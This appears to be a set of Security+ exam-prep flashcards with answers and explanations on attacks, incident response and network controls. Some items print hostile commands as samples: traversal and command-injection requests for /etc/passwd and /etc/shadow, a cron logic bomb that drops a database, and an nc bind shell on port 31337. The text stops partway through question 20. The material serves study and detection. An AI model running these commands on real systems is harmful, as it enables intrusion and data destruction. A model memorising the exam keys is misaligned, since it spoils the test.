SY0-601 Exam Braindumps 151-200 Flashcards

1
Q

A SOC operator is analyzing a log file that contains the following entries:

[06-Apr-2021-18:00:06] GET /index.php/../../../../../../etc/passwd
[06-Apr-2021-18:01:07] GET /index.php/../../../../../../etc/shadow
[06-Apr-2021-18:01:26] GET /index.php/../../../../../../../../../../etc/passwd
[06-Apr-2021-18:02:16] GET /index.php?var1=;cat /etc/passwd;$var2=7865tgydk
[06-Apr-2021-18:02:56] GET /index.php?var1=;cat /etc/shadow;$var2=7865tgydk

Which of the following explains these log entries?

a. SQL injection and improper input-handling attempts
b. Cross-site scripting and resource exhaustion attempts
c. Command injection and directory traversal attempts
d. Error handling and privilege escalation attempts

A

c. Command injection and directory traversal attempts

Explanation:

c. Command injection and directory traversal attempts: The log entries show attempts to access sensitive files on the server by exploiting vulnerabilities. Specifically, the attacker is trying to use directory traversal (../../../../../../etc/passwd and ../../../../../../etc/shadow) to navigate to sensitive files. Additionally, the attacker is attempting command injection (var1=;cat /etc/passwd;) to execute commands on the server.

SQL injection and improper input-handling attempts: SQL injection involves inserting or injecting SQL queries via input data, which is not indicated by the given log entries. The log entries show attempts to access files and execute commands rather than SQL queries.

Cross-site scripting and resource exhaustion attempts: Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. Resource exhaustion attempts aim to deplete system resources. The log entries do not show evidence of either type of attack.

Error handling and privilege escalation attempts: Error handling involves managing errors in a system, and privilege escalation involves gaining higher-level access. The log entries do not specifically show evidence of attempts to exploit error handling or escalate privileges directly.

Command injection and directory traversal attempts accurately describe the nature of the log entries, which involve attempts to access sensitive files and execute commands on the server.
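To make these signatures concrete, below is a minimal detection sketch in Python. The regular expressions are simplified assumptions for illustration, not a production rule set:

import re

# Simplified signatures for the two techniques seen in the log above.
TRAVERSAL = re.compile(r"\.\./")
CMD_INJECTION = re.compile(r"[;|`]\s*(cat|ls|id|wget)\b")

def classify(line: str) -> list[str]:
    findings = []
    if TRAVERSAL.search(line):
        findings.append("directory traversal")
    if CMD_INJECTION.search(line):
        findings.append("command injection")
    return findings

print(classify("GET /index.php/../../../../../../etc/passwd"))          # ['directory traversal']
print(classify("GET /index.php?var1=;cat /etc/passwd;$var2=7865tgydk"))  # ['command injection']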

2
Q

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

A

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.

Explanation:

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.: This describes the lessons learned phase, the final phase of the incident response plan. It involves reviewing the incident to understand the effectiveness of the response, identifying root causes, and implementing measures to prevent future incidents.

b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.: This describes the recovery phase, which occurs before the final phase. The recovery phase focuses on restoring systems to normal operation after the incident has been contained and eradicated.

c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.: This describes the identification phase, which occurs at the beginning of the incident response process. This phase involves detecting and analyzing the incident to understand its scope and impact.

d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.: This describes the containment phase, which focuses on limiting the spread and impact of the incident. It is not the final phase of the incident response plan.

The final phase of the incident response plan is crucial for improving future responses and enhancing the overall security posture of the organization. It provides an opportunity to learn from the incident and implement changes to prevent recurrence.

3
Q

HOTSPOT (Drag and Drop is not supported)
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Attack Description :
    An attacker sends multiple SYN packets from multiple sources
    Web server : Target Web Server
  2. Attack Description :
    The attack establishes a connection, which allows remote commands to be executed
    Web server : User
  3. Attack Description :
    The attack is self propagating and compromises a SQL database using well-known credentials as it moves through the network
    Web Server : Database server
  4. Attack Description :
    The attacker uses hardware to remotely monitor a user’s input activity to harvest credentials
    Web Server : Executive
  5. Attack Description :
    The attacker embeds hidden access in an internally developed application that bypasses account login
    Web Server : Application

Attack identified          Best preventative or remediation action
a. Botnet                  a. Enable DDoS protection
b. RAT                     b. Patch vulnerable systems
c. Logic bomb              c. Disable vulnerable services
d. Backdoor                d. Change the default system password
e. Virus                   e. Update cryptographic algorithms
f. Spyware                 f. Change the default application password
g. Worm                    g. Implement 2FA using push notification
h. Adware                  h. Conduct a code review
i. Ransomware              i. Implement application fuzzing
j. Keylogger               j. Implement a host-based IPS
k. Phishing                k. Disable remote access service

A

An attacker sends multiple SYN packets from multiple sources
Botnet, Enable DDoS protection

The attack establishes a connection, which allows remote commands to be executed
RAT, Disable remote access service

The attack is self-propagating and compromises a SQL database using well-known credentials as it moves through the network
Worm, Change the default application password

The attacker uses hardware to remotely monitor a user's input activity to harvest credentials
Keylogger, Implement 2FA using push notification

The attacker embeds hidden access in an internally developed application that bypasses account login
Backdoor, Conduct a code review

4
Q

SIMULATION
A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY

5
Q

SIMULATION
An attack has occurred against a company.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
You have been tasked to do the following:
-Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output.
-Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.

All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select type of attack :
1. SQL Injection
2. Cross Site Scripting
3. XML injection
4. Session Hijacking

Drag & drop :
Input validation
Code Review
WAF
URL Filtering
Record Level Access Control

against servers :
Web Server
Database
Application Source Code within Repository
CRM Server

A
  1. Cross Site Scripting
    Web Server : WAF (Web Application Firewall), URL Filtering
    Database : Input Validation
    Application Source Code within Repository : Code Review
    CRM Server : Record Level Access Control
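As a rough sketch of how the input-validation and output-encoding controls blunt XSS, here is a minimal example using only the Python standard library; the field names and allow-list rule are hypothetical:

import html
import re

USERNAME_OK = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")  # assumed allow-list rule

def render_comment(author: str, text: str) -> str:
    if not USERNAME_OK.match(author):
        raise ValueError("rejected by input validation")
    # Output encoding neutralizes script payloads before they reach the browser.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"

print(render_comment("guest01", "<script>alert(1)</script>"))
# <p><b>guest01</b>: &lt;script&gt;alert(1)&lt;/script&gt;</p>

A WAF applies the same idea at the network edge, inspecting requests before they ever reach the web server.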
6
Q

SIMULATION

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.

INSTRUCTIONS
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01

Password: guestpass
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

WiFi Controller
SSID : CORPGUEST
Shared Key:
AAA Server IP :
PSK :
Authentication type :
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP :
Authentication type :
Server IP: 192.168.1.20

Wireless Client
SSID :
Username :
User password :
PSK :
Authentication type :

A

WiFi Controller
SSID : CORPGUEST
Shared Key : SECRET
AAA Server IP : 192.168.1.20
PSK : (blank; not used with 802.1X)
Authentication type : WPA2-EAP
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP : 192.168.1.10
Authentication type : Active Directory
Server IP : 192.168.1.20

Wireless Client
SSID : CORPGUEST
Username : guest01
User password : guestpass
PSK : (blank; not used with 802.1X)
Authentication type : WPA2-Enterprise

Because the requirement is 802.1X with the most secure encryption and protocol available, authentication is WPA2-Enterprise (WPA2-EAP) against the RADIUS server, so no pre-shared key is configured.

7
Q

HOTSPOT (Drag and Drop is not supported)
An incident has occurred in the production environment.

INSTRUCTIONS
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Command output 1

$ cat /var/log/www/file.sh
#!/bin/bash

user=$(grep john /etc/passwd)
if [ "$user" = "" ]; then
  mysql -u root -p mys3cr2tdbpw -e "drop database production"
fi

$ crontab -l
*/5 * * * * /var/log/www/file.sh

Compromise type 1 :
a. RAT
b. Backdoor
c. Logic bomb
d. SQL injection
e. Rootkit

  2. Command output 2

$ cat /var/log/www/file.sh
#!/bin/bash

date=$(date +%Y-%m-%d)
echo "Type in your full name: "
read loggedName
nc -l -p 31337 -e /bin/bash
wget www.eicar.org/download/eicar.com.txt
echo "Hello, $loggedName the virus file has been downloaded"

Compromise type 2 :
a. SQL injection
b. RAT
c. Rootkit
d. Backdoor
e. Logic bomb

A
  1. c. Logic bomb
  2. d. Backdoor

Explanation: The first script is run by cron every five minutes and drops the production database only when a trigger condition is met (the user john no longer exists in /etc/passwd), which is the definition of a logic bomb. The second script binds a shell to TCP port 31337 (nc -l -p 31337 -e /bin/bash), creating hidden remote access to the host, i.e., a backdoor.
8
Q

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall polices would be MOST secure for a web server?

a.
Source  Destination  Port     Action
Any     Any          TCP 53   Allow
Any     Any          TCP 80   Allow
Any     Any          TCP 443  Allow
Any     Any          Any      Any

b.
Source  Destination  Port     Action
Any     Any          TCP 53   Deny
Any     Any          TCP 80   Allow
Any     Any          TCP 443  Allow
Any     Any          Any      Allow

c.
Source  Destination  Port     Action
Any     Any          TCP 80   Deny
Any     Any          TCP 443  Allow
Any     Any          Any      Allow

d.
Source  Destination  Port     Action
Any     Any          TCP 80   Allow
Any     Any          TCP 443  Allow
Any     Any          Any      Deny

A

d.
Source  Destination  Port     Action
Any     Any          TCP 80   Allow
Any     Any          TCP 443  Allow
Any     Any          Any      Deny

Explanation: This policy permits only the ports a web server needs (HTTP 80 and HTTPS 443) and ends with an explicit deny-all rule, following the principle of least privilege. Option a leaves the final rule's action unspecified, while options b and c end with a blanket allow that exposes unnecessary ports.
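The winning ruleset works because firewalls evaluate rules top-down and stop at the first match, so the trailing deny-all catches everything not explicitly allowed. A small Python sketch of that first-match logic, with the Any wildcard semantics assumed from the table above:

# Each rule: (source, destination, port, action); "Any" matches everything.
RULES = [
    ("Any", "Any", "TCP 80",  "Allow"),
    ("Any", "Any", "TCP 443", "Allow"),
    ("Any", "Any", "Any",     "Deny"),   # explicit default deny
]

def evaluate(src: str, dst: str, port: str) -> str:
    for r_src, r_dst, r_port, action in RULES:
        if (r_src in ("Any", src) and r_dst in ("Any", dst)
                and r_port in ("Any", port)):
            return action            # first matching rule wins
    return "Deny"                    # implicit deny if nothing matches

print(evaluate("10.0.0.5", "203.0.113.10", "TCP 443"))  # Allow
print(evaluate("10.0.0.5", "203.0.113.10", "TCP 23"))   # Deny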

9
Q

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

a. Dual supply
b. Generator
c. UPS
d. POU
e. Daily backups

A

c. UPS (Uninterruptible Power Supply)
Explanation:

A UPS (Uninterruptible Power Supply) is the best solution in this scenario for several reasons:

Brief outages: A UPS can provide immediate power during brief outages that last for a few seconds to a few minutes, ensuring that equipment stays operational without interruption.

Extended outages and brownouts: While a UPS can handle brief outages on its own, it can also bridge the gap until a backup generator can be brought online during longer outages or intentional brownouts.

Protection from power fluctuations: A UPS can protect against power surges and brownouts, which can damage sensitive equipment or cause data corruption.

Here’s why other options are less suitable:

Dual supply: This ensures redundancy by using two power sources, but if both sources are affected by the same disruption (e.g., a brownout), it won't fully mitigate the risk.

Generator: A generator is excellent for extended outages, but it takes time to start up and does not protect against very brief outages. Combining a UPS with a generator would be ideal, but the UPS alone is necessary to handle the immediate power loss.

POU (Power Outlet Unit): This is typically used for distributing power within a data center but does not provide backup power.

Daily backups: While important for data recovery, they do not prevent data loss or service interruption during the power outages themselves. They address data loss after the fact, not in real-time.

Thus, a UPS is the most effective immediate solution to prevent data loss and ensure continuous operation during brief outages and while transitioning to a backup generator during extended power disruptions.

10
Q

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

a. Shut down the VDI and copy off the event logs.
b. Take a memory snapshot of the running system.
c. Use NetFlow to identify command-and-control IPs.
d. Run a full on-demand scan of the root volume.

A

b. Take a memory snapshot of the running system

VDI = Virtual Desktop Infrastructure

Here’s why this is the preferred option:

Preserves Current State: Taking a memory snapshot captures the current state of the running system, including any processes, network connections, and memory-resident malware.

Forensic Analysis: Memory snapshots allow forensic analysts to examine the active memory of the infected VDI instance. This can reveal running processes, injected code, network connections, and potentially malicious behavior.

Non-invasive: Unlike shutting down the VDI (option a), which could potentially disrupt or alter the malware's behavior, taking a memory snapshot is non-invasive and allows the VDI to continue running, potentially gathering more information about the malware's activities.

Focus on Volatile Data: Diskless malware typically operates in memory and may leave minimal traces on disk, making memory analysis crucial for identifying and understanding its activities.

Options c and d (using NetFlow to identify command-and-control IPs and running a full on-demand scan of the root volume) are less effective for analyzing diskless malware in a VDI context. NetFlow analysis might not capture all relevant details of a diskless malware’s behavior, and a traditional on-demand scan may not detect malware that operates entirely in memory.
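As a toy illustration of why the captured memory matters, the sketch below scans a saved snapshot file for indicator strings. The file name and IOC list are hypothetical, and real analysis would use a memory-forensics framework rather than raw string matching:

import mmap

# Hypothetical indicators of compromise for demonstration only.
IOCS = [b"nc -l -p", b"mimikatz", b"203.0.113.7"]

def scan_snapshot(path: str) -> list[str]:
    hits = []
    with open(path, "rb") as f:
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mem:
            for ioc in IOCS:
                if mem.find(ioc) != -1:
                    hits.append(ioc.decode())
    return hits

print(scan_snapshot("vdi_memory.snap"))  # assumed snapshot exported from the hypervisor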

11
Q

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

a. AUP
b. NDA
c. SLA
d. MOU

A

a. AUP (Acceptable Use Policy)

Here’s why:

Acceptable Use Policy (AUP): AUPs are policies that define the rules and guidelines for using an organization's IT resources, including workstations and networks. They typically inform users about their responsibilities and limitations regarding the use of these resources. A banner presented at login that users must acknowledge (by clicking OK) serves as a form of acknowledgment and agreement to comply with the AUP.

Banner Warning: The banner presented to users upon login informs them that they have no reasonable expectation of privacy and that access is only for authorized personnel. By clicking OK, users acknowledge their understanding of these terms and agree to abide by them.

Options b, c, and d are not directly related to the scenario described:

NDA (Non-Disclosure Agreement): An NDA is a legal contract that outlines confidential material, knowledge, or information that parties wish to share with one another for certain purposes, but wish to restrict access to or by third parties.

SLA (Service Level Agreement): An SLA is a contract between a service provider and a customer that outlines the level of service the customer can expect, including metrics like uptime and response times.

MOU (Memorandum of Understanding): An MOU is a document outlining an agreement between parties that may not be legally binding but indicates a willingness to move forward with a certain course of action.

AUP vs NDA :

Acceptable Use Policy (AUP):
    AUPs govern the proper use of an organization's IT resources, defining rules and guidelines for users regarding access, behavior, and responsibilities.
    Typically, AUPs are presented to users upon accessing IT systems, requiring their acknowledgment and agreement to comply with stated policies.
    In the scenario described, users acknowledge their understanding and agreement to comply with the organization's IT usage policies (such as privacy expectations and authorized access) by clicking OK on a banner.

Non-Disclosure Agreement (NDA):
    NDAs are legal agreements between parties to protect confidential information shared during specific interactions or projects.
    They outline what information is considered confidential, who can access it, and the consequences of disclosing that information to unauthorized parties.
    NDAs are typically used in situations where confidential information, trade secrets, or proprietary data need protection from unauthorized disclosure.

In the scenario where users are presented with a banner upon login, the primary focus is on informing users about their responsibilities and limitations regarding IT system usage, not about protecting specific confidential information or trade secrets. Therefore, while NDAs are crucial for protecting sensitive information in certain contexts, they are not directly applicable to the situation where users are agreeing to comply with IT usage policies.

In summary, AUP is the most appropriate answer because it directly relates to the rules governing the use of IT resources and user responsibilities in the described scenario.

(Braindump : b)

12
Q

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees’ workstations to prevent information from leaving the company’s network?

a. HIPS
b. DLP
c. HIDS
d. EDR

A

b. DLP (Data Loss Prevention)

Here’s why DLP is the most appropriate choice:

Data Loss Prevention (DLP): DLP solutions are designed to monitor, detect, and prevent the unauthorized transmission of sensitive data outside the organization's network. They can enforce policies that govern what type of data can be sent via email, including scanning email content and attachments for sensitive information like PII, financial data, or confidential business information.

Functionality: DLP solutions can identify sensitive data based on predefined policies (such as keywords, regular expressions, or data classification) and enforce actions (such as blocking, encrypting, or alerting) when unauthorized transmissions occur.

Application to the Scenario: In this case, deploying DLP on employees' workstations would help mitigate the risk of employees inadvertently or intentionally sending sensitive information via personal email accounts. It provides a proactive measure to enforce company policies regarding data protection and ensures that sensitive data remains within authorized channels.

In contrast, the other options are less directly focused on preventing unauthorized data transmission via personal email:

HIPS (Host-based Intrusion Prevention System): Primarily focused on detecting and blocking unauthorized network attacks and exploits targeting specific host systems.
HIDS (Host-based Intrusion Detection System): Monitors and analyzes the internals of a computing system (like logs and file system changes) for signs of intrusion or unauthorized activities.
EDR (Endpoint Detection and Response): Provides real-time monitoring and response to threats on endpoints, focusing more on detecting and responding to malicious activities rather than preventing data loss through unauthorized emails.

(Braindump : d. EDR)
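To illustrate the kind of matching a DLP policy engine performs on outbound content, here is a minimal sketch; the patterns are deliberately simplified assumptions, not real product rules:

import re

# Simplified detectors; real DLP combines keywords, classifiers, and
# document fingerprints, far beyond these two patterns.
PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def scan_outbound(message: str) -> list[str]:
    """Return the policy labels that would block or flag this message."""
    return [label for label, rx in PATTERNS.items() if rx.search(message)]

print(scan_outbound("Client SSN is 123-45-6789"))  # ['ssn'] -> block and alert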

13
Q

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

a. Shoulder surfing
b. Watering-hole attack
c. Tailgating
d. Impersonation

A

c. Tailgating

Explanation:

Tailgating: This occurs when an unauthorized individual follows closely behind an authorized person to gain entry into a restricted area without proper authentication. In this case, the unknown individual is taking advantage of the employee's courtesy by holding the door open and thereby bypassing the secure access control, exploiting the trusting nature of the employee.

Shoulder surfing: Involves observing someone's confidential information (like passwords or PINs) by looking over their shoulder as they enter it.

Watering-hole attack: Targets a specific group by compromising websites they are likely to visit, rather than physical access scenarios.

Impersonation: Involves pretending to be someone else to gain access, which is not explicitly demonstrated in the scenario provided.
14
Q

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

a. Personal health information
b. Personally identifiable information
c. Tokenized data
d. Proprietary data

A

a. Personal health information (PHI)

Explanation:

Personal health information (PHI) includes any individually identifiable health information that is held or maintained by a covered entity or business associate. This includes medical diagnosis codes, patient names, and other health-related information.

Personally identifiable information (PII) typically refers to any information that can be used to identify an individual, which could include personal health information but is broader in scope.

Tokenized data refers to data that has been replaced with a non-sensitive equivalent (token) that has no extrinsic or exploitable meaning or value.

Proprietary data refers to information that is owned or controlled by an organization and is not specifically related to personal or health information.

In the context provided, the concern about medical diagnosis codes and patient names being left unsecured directly relates to the privacy and security requirements around personal health information (PHI), making option a. Personal health information the most appropriate choice.

15
Q

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

a. Shadow IT
b. Script kiddies
c. APT
d. Insider threat

A

c. APT (Advanced Persistent Threat)

Explanation:

Advanced Persistent Threat (APT): APTs are sophisticated adversaries, often state-sponsored or well-funded, that conduct prolonged and targeted attacks on specific organizations. They are characterized by their ability to remain undetected for extended periods, exfiltrate large amounts of data, and adapt their tactics to avoid detection.

Here’s why the other options are less likely:

Shadow IT: Refers to unauthorized applications or services used within an organization without explicit approval. While it can pose security risks, it typically doesn't involve sophisticated data exfiltration over an extended period as described.

Script kiddies: Usually refer to individuals with limited technical skills who use existing scripts or tools to launch simple attacks. They are unlikely to sustain a sophisticated operation over a year without detection.

Insider threat: While an insider could be involved in data exfiltration, the prolonged nature and sophistication of the attack described (abnormal external connections over a long period) suggest a more organized and persistent threat actor than a typical insider threat scenario.

Therefore, considering the prolonged and stealthy nature of the attack targeting specific data, an Advanced Persistent Threat (APT) is the most plausible threat actor in this case.

(Braindump : d. Insider threat)
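The clue that exposed the APT (external connections while the employee was not working) can be approximated with a simple off-hours filter. A sketch with assumed business hours and hypothetical log entries:

from datetime import datetime

WORK_HOURS = range(8, 18)  # assumed 08:00-18:00 business day

def off_hours(events: list[tuple[str, str]]) -> list[tuple[str, str]]:
    """Flag (timestamp, destination) connections made outside working hours."""
    flagged = []
    for ts, dest in events:
        when = datetime.fromisoformat(ts)
        if when.hour not in WORK_HOURS or when.weekday() >= 5:
            flagged.append((ts, dest))
    return flagged

events = [("2021-04-06T02:14:00", "198.51.100.9"),   # hypothetical entries
          ("2021-04-06T10:30:00", "192.0.2.25")]
print(off_hours(events))  # only the 02:14 connection is flagged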

16
Q

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

a. The required intermediate certificate is not loaded as part of the certificate chain.
b. The certificate is on the CRL and is no longer valid.
c. The corporate CA has expired on every server, causing the certificate to fail verification.
d. The scanner is incorrectly configured to not trust this certificate when detected on the server.

A

a. The required intermediate certificate is not loaded as part of the certificate chain.

Explanation:

Intermediate Certificate: When an SSL/TLS certificate is issued, it often relies on an intermediate certificate (or chain of intermediate certificates) to verify its authenticity up to a trusted root certificate authority (CA). If the intermediate certificate is not properly installed on the server along with the SSL certificate, the server may not send the full certificate chain during the SSL handshake.

SSL Certificate Chain: During the SSL handshake process, the client (vulnerability scanner, in this case) needs to verify the entire chain of certificates from the server's SSL certificate up to a trusted root certificate authority. If any intermediate certificate is missing, the chain of trust is broken, and the certificate might appear as untrusted to the scanner.

Other Options Explanation:
    b. The certificate is on the CRL and is no longer valid: This would typically result in the certificate being flagged as revoked, not untrusted.
    c. The corporate CA has expired on every server, causing the certificate to fail verification: This would indicate an issue with the corporate CA's validity, not specifically with the SSL certificate's trust status.
    d. The scanner is incorrectly configured to not trust this certificate when detected on the server: This would be a configuration issue on the scanner side and less likely the reason for the untrusted status if the certificate is valid and properly configured on other servers.

Therefore, a. The required intermediate certificate is not loaded as part of the certificate chain is the most likely reason for the vulnerability scanner to report the SSL certificate as untrusted despite its validity and installation on other servers without issue.
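One way to reproduce the scanner's view is to attempt strict verification from a client that does not fetch missing intermediates. A sketch using Python's ssl module, with a placeholder host name; a server missing its intermediate typically fails here with "unable to get local issuer certificate":

import socket
import ssl

def check_chain(host: str, port: int = 443) -> str:
    ctx = ssl.create_default_context()  # verifies the chain up to a trusted root
    try:
        with socket.create_connection((host, port), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return "chain verified"
    except ssl.SSLCertVerificationError as e:
        return f"verification failed: {e.verify_message}"

print(check_chain("server.example.com"))  # placeholder host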

17
Q

A company wants to improve end users’ experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner’s website?

a. Directory service
b. AAA server
c. Federation
d. Multifactor authentication

A

c. Federation

Explanation:

Federation enables a single sign-on (SSO) experience across different organizations or domains. It allows users to use their existing credentials from one organization (in this case, the company's credentials) to access services and resources in another organization (the trusted partner's website).

How Federation Works:
    The company and the trusted partner establish a trust relationship.
    Users authenticate once with their company's identity provider (IdP).
    Upon accessing the trusted partner's website, the company's IdP securely passes authentication information to the partner's service provider (SP).
    The SP trusts the authentication from the IdP and grants access without requiring the user to re-enter credentials.

Benefits of Federation:
    Simplifies user experience by eliminating the need for separate credentials.
    Enhances security as authentication and authorization are handled centrally by the company's IdP.
    Reduces administrative overhead by managing user accounts centrally.

Other Options Explained:

a. Directory service: While directory services manage user identities and permissions within an organization, they typically do not facilitate SSO across different domains or organizations.

b. AAA server (Authentication, Authorization, and Accounting): AAA servers are used for managing network access and are not specifically designed for cross-organization authentication.

d. Multifactor authentication (MFA): While MFA enhances security by requiring multiple factors for authentication, it does not address the requirement of using existing credentials across organizations without issuing separate credentials.
18
Q

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

a. Legal hold
b. Chain of custody
c. Data loss prevention
d. Content filter

A

a. Legal hold

Explanation:

Legal hold is a process in which an organization preserves all relevant information related to a legal case or investigation. It ensures that potentially relevant data, including emails, cannot be deleted, altered, or destroyed. Here’s why it's the correct choice:

Preservation of Data: Legal hold mandates that all potentially relevant data, including emails, must be preserved in its original state. This prevents any tampering or deletion that could hinder the investigation.

Compliance: It ensures compliance with legal and regulatory requirements by preserving data that may be subject to investigation or litigation.

Process: Legal hold involves identifying and suspending the routine deletion or modification of relevant data, including emails, and keeping them intact until the hold is lifted.

Other Options Explained:

b. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical and electronic evidence. While important for maintaining evidence integrity, it primarily applies to physical evidence rather than digital data like emails.

c. Data loss prevention (DLP): DLP systems aim to prevent unauthorized transmission of sensitive information outside the organization. While they can help prevent accidental or malicious data leaks, they do not specifically ensure that data is preserved for legal investigations.

d. Content filter: Content filters are used to monitor and control the flow of data, typically to enforce acceptable use policies and protect against malware and phishing. They do not focus on preserving data for legal investigations.

Therefore, a. Legal hold is the best choice for ensuring that emails and other relevant data are preserved intact and accessible for the investigation without the risk of deletion or alteration.

19
Q

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

a. Time-based logins
b. Geofencing
c. Network location
d. Password history

A

a. Time-based logins

Explanation:

Time-based logins refer to policies or configurations that restrict or allow access to systems, networks, or applications based on specific times or schedules. In this case:
    The user experienced issues logging in over the weekend but was able to log in successfully on Monday.
    This inconsistency suggests that access might be restricted or problematic during non-standard hours (such as weekends) due to time-based access controls.

Why the Other Options are Not Appropriate:

b. Geofencing: Geofencing policies restrict access based on the physical location of the user. However, the issue described does not involve location-based access restrictions but rather time-based access.

c. Network location: Similar to geofencing, network location policies define access based on the user's network location (e.g., internal network vs. external network). This scenario does not indicate any issues related to network location restrictions.

d. Password history: Password history policies dictate how frequently passwords can be reused or how often they must be changed. This is unrelated to the described issue of intermittent access during specific times.

Therefore, a. Time-based logins is the most appropriate description of the policy being implemented based on the user’s experience of successful login during standard work hours but issues during the weekend.
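A time-based login policy boils down to a schedule check at authentication time. A minimal sketch, where the allowed window is an assumption for illustration:

from datetime import datetime

# Assumed policy: VPN logins allowed Monday-Friday, 06:00-20:00.
ALLOWED_DAYS = range(0, 5)   # Monday=0 ... Friday=4
ALLOWED_HOURS = range(6, 20)

def login_permitted(ts: str) -> bool:
    when = datetime.fromisoformat(ts)
    return when.weekday() in ALLOWED_DAYS and when.hour in ALLOWED_HOURS

print(login_permitted("2021-04-10T14:00:00"))  # Saturday -> False
print(login_permitted("2021-04-12T09:00:00"))  # Monday   -> True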

20
Q

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

a. Semi-authorized hackers
b. State actors
c. Script kiddies
d. Advanced persistent threats

A

b. State actors

Explanation:

State actors are typically government-sponsored entities or groups acting on behalf of a government. They often have significant resources, capabilities, and motivations to conduct cyber attacks for political, economic, or military purposes.

Why the Other Options are Not Appropriate:

a. Semi-authorized hackers: This term is less commonly used in cybersecurity and does not specifically denote state-sponsored activity. It might imply individuals with some level of authorization but does not fit the description of government-backed actors.

